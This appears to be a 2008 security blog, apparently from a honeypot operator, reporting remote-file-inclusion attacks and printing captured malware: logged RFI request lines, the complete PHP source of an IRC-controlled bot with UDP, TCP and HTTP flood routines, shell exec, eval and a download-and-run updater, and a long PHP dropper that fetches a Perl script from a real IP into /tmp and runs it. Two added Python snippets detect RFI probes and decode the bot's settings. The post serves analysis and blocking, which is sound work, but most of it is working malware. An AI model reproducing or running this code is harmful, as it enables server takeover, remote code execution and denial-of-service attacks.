Friday, October 3. 2008
onspeed.com as an accelerator for hackers
According to its website, onspeed.com is a service that is meant to speed up browsing over slow connections. If I have understood this correctly, for just under 25 dollars you get access to a service that answers browser requests from a cache of compressed data (deflate). However, this also makes it possible to run RFI scans at a fairly high speed. This is not meant as advertising. I mean it seriously. onspeed has not replied to my mails so far, hence my recommendation to all admins, hostmasters and whoever else to block the following domains/IPs:
As of 3.10.2008 17:05
domain                     IP
---------------------------------------------------------
navaho.onspeed.com         72.3.137.82
yuma.onspeed.com           72.3.137.83
vanadium.onspeed.com       83.138.172.72
chromium.onspeed.com       83.138.172.76
silicon.onspeed.com        212.100.250.218
sulphur.onspeed.com        212.100.250.225
aluminium.onspeed.com      212.100.250.217
nickel.onspeed.com         212.100.250.230
Personally, I have no problem with being a little more generous:
72.3.137.0/24
83.138.172.0/24
212.100.250.0/24
Here is an excerpt from the abuse mail:
Saturday, September 13. 2008
[honeyd] rfi - lists
The rush to make me a victim has meanwhile become so great that, while I am still trying to write scripts, the situation has already changed so much that I have to rethink the concept all over again ;)
Saturday, August 9. 2008
[malware] RFI attacks with the help of pastebin.ubuntu.com
Whether ubuntu is your preferred distribution is beside the point here. Evidently, however, the pastebin in "plain" mode is being abused to take over websites.
CODE:
cat rfi.txt |grep pastebin
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33902/plain/???
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33897/plain/?
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33924/plain/?
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33924/plain/
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33946/plain/?
/doc///vwar/backup/errors.php?error=http://pastebin.ubuntu.com/35446/plain/???
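The pattern in these requests (a script parameter whose value is a complete remote URL, padded with trailing question marks) can be picked out of a request log automatically. The following is an added example, not part of the original post; the names find_rfi, summarize and SAMPLE_REQUESTS are hypothetical, and the last two sample requests are constructed.

```python
"""Flag remote-file-inclusion (RFI) probes in logged request lines (added example)."""
from collections import Counter
from urllib.parse import unquote, urlsplit

SAMPLE_REQUESTS = [
    # Request lines quoted from the rfi.txt listing above.
    "/doc//contenido/includes/include.newsletter_jobs_subnav.php"
    "?cfg[path][contenido]=http://pastebin.ubuntu.com/33902/plain/???",
    "/doc//contenido/includes/include.newsletter_jobs_subnav.php"
    "?cfg[path][contenido]=http://pastebin.ubuntu.com/33924/plain/",
    "/doc///vwar/backup/errors.php?error=http://pastebin.ubuntu.com/35446/plain/???",
    # Constructed benign requests that must not be flagged.
    "/index.php?page=about",
    "/search.php?q=http+tutorial",
]

REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def decode(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (scanners often double-encode)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_rfi(request):
    """Return (script, parameter, remote_url) for every parameter that carries a URL."""
    script, _, query = request.partition("?")
    hits = []
    for chunk in query.split("&"):
        name, _, value = chunk.partition("=")
        value = decode(value).strip()
        if value.lower().startswith(REMOTE_SCHEMES):
            # The trailing '?' characters turn whatever suffix the vulnerable
            # script appends into a query string of the remote URL; strip them
            # so identical pastes group together.
            hits.append((script, decode(name), value.rstrip("?")))
    return hits


def summarize(requests):
    """Count RFI probes per remote host, e.g. to decide what to report or block."""
    hosts = Counter()
    for request in requests:
        for _script, _param, url in find_rfi(request):
            hosts[urlsplit(url).hostname] += 1
    return hosts


if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        for script, param, url in find_rfi(request):
            print(f"{script}  param={param}  includes={url}")
    print(dict(summarize(SAMPLE_REQUESTS)))
```

An included URL that itself contains "&" is cut at that character by this simple splitter; the prefix that remains is still enough to flag the request.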
Let us take a look at this last "pastebin":
CODE:
<?php
ignore_user_abort(TRUE);
set_time_limit(0);
error_reporting(E_ALL);
class bMain
{
var $config = array(
// "prefix" => "HOMOVAN|",
"maxnumbers" => 5,
"maxident" => 6,
"trigger" => ".",
"modes" => "-ix",
"adminhosts" => array("i.love.ircsluts.net"),
"sockbuffer" => 512,
"rejoindelay" => 900,
"cpingdelay" => 10,
"chessburstudp" => 5000,
"chessbursttcp" => 100,
"httpburst" => 20,
);
var $servers = array(
array(
"host" => "Y2FydGVyLndpZ2d5bmV0Lm9yZy51aw==",
"port" => "OTAwMA==",
"channels" => array("I21vYmZpZ2dh"),
"control" => true,
),
);
var $bots = array();
var $lastrejointime;
function bMain()
{
$this->lastrejointime = time();
}
function start()
{
foreach ($this->servers as $srv)
{
$bot = new bBot;
$bot->setnick($this->generatenick());
$bot->setcontrol($srv["control"]);
foreach ($srv["channels"] as $chan) $bot->channels[] = base64_decode($chan);
$bot->setdestination(base64_decode($srv["host"]),base64_decode($srv["port"]),$this->generateident());
$bot->lastreconnect = time();
$bot->connect();
$this->bots[] = $bot;
}
while (1) $this->heartbeat();
}
function heartbeat()
{
if (time()-$this->lastrejointime >= $this->config["rejoindelay"])
{
$this->lastrejointime = time();
$botcnt = count($this->bots);
for ($i=0; $i<$botcnt; $i++) $this->bots[$i]->joinchans();
}
foreach ($this->bots as $botlol) {
if ($botlol->isconnected()) $botlol->parsebuffer();
elseif (time()-10 > $botlol->lastreconnect) {
/* $botlol->lastreconnect = time();
$botlol->setnick($this->generatenick());
$botlol->connect();*/
exit();
}
}
}
function generatenick()
{
/* $randnick = $this->config["prefix"];
for ($i=0;$i<$this->config["maxnumbers"];$i++) $randnick .= mt_rand(0,9);
return $randnick;*/
$nprefixes = array("Wolf","Wolfeh","Wolfy","Dog","Doggy","Doggy","Cheetah","Yiff","Yiffy","Lion","Lioness","Tiger","Tigah","Aardvark","Badger","Beaver","Cat","Kitty","Deer","Donkey","Donkeh","Bear","Grizzly","Hamster","Pikachu","Mudkip","Goat","Coyote","Flame","Mustang","Lynx","Stallion","Tapir","Panda","Pony","Bunny","Dawg","Inu","Neko","Usagi","Kitsune","Kitune","Tails","Horny","Kinky","Yiffy","Sexy","Manly","Female","Horneh","Sex","Sxc","Flame","Viper","Fire","Desu","Angry","Happy","Playful","Naughty","Good","Speed","Snow","Beach","Windy","Dream","Dreamer","Afro","Skritchy","Lovely","Sonic");
$newnick = $nprefixes[array_rand($nprefixes)].$nprefixes[array_rand($nprefixes)];
for ($i=0; $i<mt_rand(1,$this->config["maxnumbers"]); $i++) $newnick .= mt_rand(0,9);
return strtolower($newnick);
}
function generateident()
{
$alph = range("a","z");
$randident = "";
for($i = 0;$i<$this->config["maxident"];$i++) $randident .= $alph[rand(0,25)];
return $randident;
}
function activeconnections()
{
$concount = 0;
foreach ($this->bots as $bot)
{
if ($bot->isconnected()) $concount++;
}
return $concount;
}
function startchess($t, $h, $p, $ps, $ti)
{
/* if (strlen($this->chessfile) < 1) $this->chessfile = $this->createchessfile();
$this->spawnfakethreads("php ".$this->chessfile." ".base64_encode($h)." ".base64_encode($p)." ".base64_encode($ps)." ".base64_encode($t), intval($th));*/
$ho = "";
if ($t == "udp") {
$burst = $this->config["chessburstudp"];
$ho = "udp://";
//print("using udp $burst\n");
}
elseif ($t == "tcp") {
$burst = $this->config["chessbursttcp"];
$ho = "tcp://";
//print("using tcp $burst\n");
}
//else print("else $t\n");
$ho .= $h;
$lastping = 0;
$out = "";
for($i=0;$i<$ps;$i++) $out .= chr(mt_rand(1, 256));
$i = 0;
$pakcnt = 0;
$timei = time();
while (1) {
if ($p < 1 || $p > 65000) $po = mt_rand(1,65000);
else $po = $p;
@$fp = fsockopen($ho, $po, $errno, $errstr, 1);
if ($fp) {
fwrite($fp, $out);
fclose($fp);
}
$i++;
if ($i >= $burst) {
$ctime = time();
if ($ctime - $lastping >= $this->config["cpingdelay"]) {
foreach ($this->bots as $botlol) {
$botlol->raw("PING");
}
$lastping = $ctime;
}
$pakcnt += $i;
if ($ctime - $timei >= $ti) return $pakcnt;
else $i = 0;
}
}
}
function starthttp($url, $secs)
{
$agents = array(
"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.4/Megaupload x.0",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20030306 Camino/0.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0",
"Opera/9.50 (Windows NT 5.1; U; en-GB)",
"Opera/9.50 (Windows NT 5.1; U; en-US)",
);
$parsed = parse_url($url);
if (!$parsed) return false;
$servip = gethostbyname($parsed['host']);
if (!$parsed['query']) $parsed['query'] = "";
$lastping = 0;
$i = 0;
$reqcnt = 0;
$timei = time();
while (1) {
if ($sock = fsockopen($servip, 80, $errno, $errstr, 1)) {
$packet = "GET ".$parsed['path']."?".$parsed['query']." HTTP/1.1\r\n"
. "User-Agent: ".$agents[array_rand($agents)]."\r\n"
. "Host: ".$parsed['host']."\r\n"
. "Connection: Keep-Alive\r\n\r\n";
fwrite($sock, $packet);
fclose($sock);
}
$i++;
if ($i >= $this->config["httpburst"]) {
$ctime = time();
if ($ctime-$lastping >= $this->config["cpingdelay"]) {
foreach ($this->bots as $botlol) {
$botlol->raw("PING");
}
$lastping = $ctime;
}
$reqcnt += $i;
if ($ctime - $timei >= $secs) return $reqcnt;
else $i = 0;
}
}
}
/* function spawnfakethreads($cmd, $qty)
{
if (stristr(PHP_OS, "WIN")) $fullcmd = "start $cmd";
else $fullcmd = "$cmd > /dev/null 2>&1 &";
for ($i=0; $i<$qty; $i++) {
shell_exec($fullcmd);
}
}*/
function update($url, $killprocess, $runcmd, $sourcebot, $source)
{
//$starttime = time();
$updcode = file_get_contents($url);
if ($updcode) $sourcebot->say("Got ".strlen($updcode)." bytes", $source);
else return false;
//$destfile = $this->randtempfile();
$destfile = tempnam("/tmp", "pdata");
$fh = fopen($destfile, "w");
fwrite($fh, $updcode);
fclose($fh);
$this->spawnfakethreads($runcmd." ".$destfile, 1);
unlink($destfile);
if ($killprocess = 1) die("Updating");
}
/* function createchessfile()
{
$tmpfile = tempnam("datab", "/tmp");
$fh = fopen($tmpfile, "w");
fwrite($fh, base64_decode($this->csrc));
fclose($fh);
return $tmpfile;
}*/
}
class bBot
{
var $currenthost;
var $currentport;
var $currentident;
var $currentnick = "unset";
var $channels = array();
var $allowcontrol = false;
var $socket;
var $lastreconnect;
function setdestination($host, $port, $ident)
{
$this->currenthost = $host;
$this->currentport = $port;
$this->currentident = $ident;
}
function connect()
{
$this->socket = fsockopen($this->currenthost, $this->currentport, $errno, $errstr, 5);
if (feof($this->socket))
{
print("connection error: $errstr [$errno]\n");
return false;
}
stream_set_blocking($this->socket, 0);
$this->raw("USER ".$this->currentident." 127.0.0.1 localhost :".php_uname()."");
$this->raw("NICK ".$this->currentnick);
return true;
}
function disconnect()
{
$this->raw("QUIT :Disconnecting");
fclose($this->socket);
}
function setnick($nick, $set = false)
{
if ($set) $this->raw("NICK $nick");
$this->currentnick = $nick;
}
function setcontrol($control)
{
$this->allowcontrol = $control;
}
function joinchans()
{
foreach ($this->channels as $chan) $this->raw("JOIN $chan");
}
function raw($text)
{
fwrite($this->socket, $text."\r\n");
}
function say($text, $target, $notice = false)
{
if (!$notice) $this->raw("PRIVMSG $target :$text");
else $this->raw("NOTICE $target :$text");
}
function isconnected()
{
if ($this->socket && !feof($this->socket)) return true;
else return false;
}
function parsebuffer()
{
global $mainclass;
$buf = trim(fgets($this->socket, $mainclass->config["sockbuffer"]));
if (!$buf || strlen($buf) < 3)
{
usleep(100000);
return false;
}
if (substr($buf,0,6) == "PING :") $this->raw("PONG :".substr($buf,6));
$cmd = explode(" ", $buf);
if (isset($cmd[1]))
{
switch ($cmd[1])
{
case "001":
$this->raw("MODE ".$this->currentnick." :".$mainclass->config["modes"]);
$this->joinchans();
break;
case "433":
$this->raw("NICK {$this->currentnick}");
break;
case "PRIVMSG":
if (!$this->allowcontrol) break;
$host = explode("@", $cmd[0]);
$text = substr($cmd[3], 1);
for ($i=4; $i<1024; $i++) {
if (isset($cmd[$i])) $text .= " ".$cmd[$i];
else break;
}
if (substr($text, 0, 1) == $mainclass->config["trigger"]) {
$textnoprefix = substr($text, 1);
$textsplit = explode(" ", $textnoprefix);
//if ($host[1] == $mainclass->config["adminhost"]) $this->parsecommand($textsplit, $cmd[2], $cmd[0]);
foreach ($mainclass->config["adminhosts"] as $admhost) {
if (stristr($host[1], $admhost)) {
$this->parsecommand($textsplit, $cmd[2], $cmd[0]);
break;
}
}
}
break;
case "KICK":
if ($cmd[3] == $this->currentnick) $this->joinchans();
break;
}
}
}
function parsecommand($args, $source, $hostname = "")
{
global $mainclass;
$numargs = count($args)-1;
switch ($args[0]) {
// ADMIN COMMANDS GO HERE
case "test":
$this->say("hello", $source);
break;
case "status":
$this->say("Connected to ".$mainclass->activeconnections()." server(s).", $source);
break;
case "info":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
$safemode = "on";
} else {
$safemode = "off";
}
$uname = php_uname();
$this->say("$uname (safe: $safemode)", $source);
if ($_SERVER['SERVER_NAME'] && $_SERVER['REQUEST_URI']) $this->say("http://" . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . "", $source);
break;
case "die":
$this->raw("QUIT :Die command received from $source");
die();
break;
case "chess":
if ($numargs < 5) {
$this->say("Usage: ".$mainclass->config["trigger"]."chess [type (tcp/udp)] [host] [port] [bytes] [secs]", $source);
break;
}
if ($args[1] != "tcp" && $args[1] != "udp") {
$this->say("Invalid type specified", $source);
break;
}
$this->say("Chess starting", $source);
$psizeint = intval($args[4]);
$secsint = intval($args[5]);
$pakits = $mainclass->startchess($args[1], $args[2], intval($args[3]), $psizeint, $secsint);
$mbsent = round(($psizeint*$pakits)/1048576, 2);
$this->say("Chess finished (".$args[1].") - host: ".$args[2].":".$args[3].", psize: ".$args[4].", secs: ".$args[5].", sent: ".$mbsent." megabytes at ".round($mbsent/$secsint, 2)." mb/s", $source);
break;
/* case "stopchess":
if ($mainclass->chessrunning) $this->say("Stopping chess!", $source);
else $this->say("You're not playing chess you asshat", $source);
$mainclass->stopchess = true;
break;*/
case "update":
if ($numargs < 3) {
$this->say("Usage: ".$mainclass->config["trigger"]."update [url] [run with] [kill this process (0/1)]", $source);
break;
}
$this->say("Starting update download...", $source);
if (!$mainclass->update($args[1], $args[2], intval($args[3]), $this, $source)) $this->say("Error downloading file, aborting.", $source);
break;
case "connections":
foreach ($mainclass->bots as $botid => $botlol) if ($botlol->isconnected()) $this->say("(\2".$botid."\2) ".$botlol->currenthost.":".$botlol->currentport." - ".$botlol->currentnick, $source);
break;
case "connect":
if ($numargs < 5) {
$this->say("Usage: ".$mainclass->config["trigger"]."connect [host] [port] [nick (0=rand)] [channels (,)] [control (0,1)]", $source);
break;
}
$this->say("Connecting to ".$args[1]."...", $source);
$newbot = new bBot;
if ($args[3] != "0") $newbot->setnick($args[3]);
else $newbot->setnick($mainclass->generatenick());
if ($args[5] == "1") $newbot->setcontrol(true);
else $newbot->setcontrol(false);
$newchannels = explode(",", $args[4]);
foreach ($newchannels as $newchan) $newbot->channels[] = $newchan;
$newbot->setdestination($args[1],$args[2],$mainclass->generateident());
$newbot->connect();
if ($newbot->isconnected()) {
$mainclass->bots[] = $newbot;
$this->say("Connection successful, use "disconnect" to disconnect.", $source);
}
else $this->say("Connection error!", $source);
break;
case "disconnect":
if ($numargs < 1) {
$this->say("Usage: ".$mainclass->config["trigger"]."disconnect [conid]", $source);
break;
}
$conid = intval($args[1]);
if (strlen($args[1]) > 2 || !$mainclass->bots[$conid]) {
$this->say("Invalid connection ID", $source);
break;
}
if ($mainclass->bots[$conid]->allowcontrol) {
$ctrlbots = 0;
foreach ($mainclass->bots as $bawt) {
if ($bawt->allowcontrol) $ctrlbots++;
}
if ($ctrlbots <= 1) {
$this->say("Cannot disconnect while only one control connection remaining, use "die"", $source);
break;
}
}
if (count($mainclass->bots) <= 1) {
$this->raw("QUIT :Final connection dropped, quitting");
die();
break;
}
if ($mainclass->bots[$conid]) {
$mainclass->bots[$conid]->disconnect();
unset($mainclass->bots[$conid]);
sort($mainclass->bots);
$this->say("Connection ".$args[1]." disconnected", $source);
}
else $this->say("Invalid connection ID", $source);
break;
case "exec":
$txt = "";
for ($i=1; $i<1024; $i++) {
if (isset($args[$i])) $txt .= $args[$i]." ";
else break;
}
$ph = popen($txt." 2>&1", "r");
$read = fread($ph, 8192);
$out = explode("\n", $read);
pclose($ph);
foreach ($out as $line)
{
$this->say(trim($line), $source);
//sleep(1);
}
break;
case "eval":
ob_start();
eval($args);
$outa = explode("\n", ob_get_flush());
foreach ($outa as $line)
{
$this->say(trim($line), $source);
//sleep(1);
}
ob_end_flush();
break;
case "http":
if ($numargs < 2) {
$this->say("Usage: ".$mainclass->config["trigger"]."http [url] [secs]", $source);
break;
}
$this->say("HTTP request flood starting", $source);
$requests = $mainclass->starthttp($args[1], intval($args[2]));
if ($requests && $requests > 0) $this->say("HTTP flood finished - sent ".$requests." requests", $source);
else $this->say("HTTP flood error, no requests sent", $source);
break;
}
}
}
$mainclass = new bMain;
$mainclass->start();
?>
Interesting: the base64 encoding of the server and channel variables.
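Because base64 is an encoding and not encryption, the connection settings can be read straight out of a captured sample without running it, which gives the host, port and channel to report or block. The following is an added example, not part of the original post; the names try_b64 and decode_config are hypothetical, and SAMPLE repeats the $servers block from the listing above.

```python
"""Recover base64-obfuscated settings from the sample's $servers array (added example)."""
import base64
import binascii
import re

# The $servers block as it appears in the sample above.
SAMPLE = '''
var $servers = array(
array(
"host" => "Y2FydGVyLndpZ2d5bmV0Lm9yZy51aw==",
"port" => "OTAwMA==",
"channels" => array("I21vYmZpZ2dh"),
"control" => true,
),
);
'''

# "key" => "value"   or   "key" => array("v1", "v2", ...)
PAIR = re.compile(r'"(\w+)"\s*=>\s*(array\(([^)]*)\)|"([^"]*)")')


def try_b64(token):
    """Return the decoded text if token is strict base64 of printable ASCII, else None."""
    if len(token) % 4:
        return None
    try:
        raw = base64.b64decode(token, validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, ValueError):
        # Covers invalid alphabet/padding and non-ASCII results.
        return None
    return text if text and text.isprintable() else None


def decode_config(php_source):
    """Map each config key to the list of its values that decode cleanly."""
    found = {}
    for match in PAIR.finditer(php_source):
        key, array_body, scalar = match.group(1), match.group(3), match.group(4)
        if array_body is not None:
            literals = re.findall(r'"([^"]*)"', array_body)
        else:
            literals = [scalar]
        decoded = [text for text in map(try_b64, literals) if text is not None]
        if decoded:
            found[key] = decoded
    return found


if __name__ == "__main__":
    for key, values in decode_config(SAMPLE).items():
        print(f"{key}: {', '.join(values)}")
```

Only the values on the right-hand side of "=>" are decoded, so key names such as "host" are never mistaken for encoded data.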
Saturday, June 21. 2008
[malware] adu/idku.txt??
...ever since one of my domains became established in the search engines, a few things have been coming in that I first have to "answer" :)
adu/idku.txt Google Search
CODE:
<?
@passthru('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;lwp-downloadhttp://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
